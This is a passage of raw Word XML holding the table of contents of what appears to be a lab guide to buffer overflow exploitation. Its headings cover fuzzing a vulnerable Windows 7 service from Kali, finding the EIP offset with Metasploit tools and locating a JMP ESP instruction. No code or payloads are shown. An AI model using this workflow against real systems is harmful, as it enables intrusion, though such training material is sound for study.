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889255994"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="614D16BF" w14:textId="704AD457" w:rsidR="00EC231C" w:rsidRDefault="00EC231C">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4A1DCAAC" w14:textId="3034B322" w:rsidR="001C5794" w:rsidRDefault="00EC231C">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7350156" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Start the vulnerable service on the Windows 7 box</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350156 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73F502B2" w14:textId="3CACBBB4" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350157" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Check the ip address of the server ang get the port it is listening on</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350157 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19755B2E" w14:textId="09941405" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350158" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test accessibility to the service from Kali using netcat</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350158 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4637B892" w14:textId="29F24D0C" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350159" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Start the debugger on the victim machine</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350159 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62B0901B" w14:textId="283A4CF9" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350160" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Automatic Fuzzing on Kali</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350160 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A953832" w14:textId="50D5D6B3" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350161" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create spike script.</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350161 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3999AE95" w14:textId="05CA93A9" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350162" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Check the debugger on the Win7 box</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350162 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57CB4A7E" w14:textId="10A94D15" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350163" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create a spike script for a different variable</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350163 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CF59EBD" w14:textId="51F292D7" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350164" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Manual fuzzing with python</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350164 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65D77FC4" w14:textId="2D5C4292" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350165" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create a script to send data to the Class variable with manual input</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350165 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="174D6A82" w14:textId="1E5D6520" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350166" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create a script to send data to the Class variable with automatic input</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350166 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FFBAAB6" w14:textId="2F41E17F" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350167" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Find the exact offset size using pattern_create in Metasploit</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350167 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44D0C569" w14:textId="7841BE03" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350168" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Run the pattern_create script</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350168 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="183216F4" w14:textId="1D780AF8" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350169" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>On win 7 check the registers for the value in EIP</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350169 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54A73EE5" w14:textId="2C45CD71" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350170" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Run pattern_offset script to get exact offset</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350170 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F24B022" w14:textId="00B77722" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350171" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Locate a ‘JMP ESP’ instruction</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350171 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
